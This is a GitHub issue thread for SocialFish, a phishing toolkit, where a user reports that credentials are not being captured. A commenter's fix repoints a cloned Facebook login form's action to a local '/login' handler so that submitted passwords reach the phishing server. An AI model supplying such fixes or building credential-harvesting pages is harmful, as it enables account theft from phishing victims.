### ISSUE TITLE
credentials not capturing please help me to fix it

### ISSUE THREAD

**Issue by swamy3697** [UndeadSec/SocialFish#304]
Before you submit this bug report check that you have ran the required setup correctly. Follow [the steps on the wiki](https://github.com/UndeadSec/SocialFish/wiki/Setting-Up-SocialFish).

**Describe the bug**

**To Reproduce**

**Expected behavior**

**Screenshots**

**Desktop (please complete the following information):**

**Smartphone (please complete the following information):**

**Additional context**
![Screenshot_2021-12-12_03_37_10](https://user-images.githubusercontent.com/85001141/145692478-0482fff2-a49b-4097-82f3-4432bf6c94c8.png)

**Comment by 200549642** [comment]
oky, thank you

**Comment by franklintimoteo** [comment]
try to change

```
<form id="login_form" action="https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&amp;lwv=110" method="post"

to 
<form id="login_form" action="/login" method="post"
```
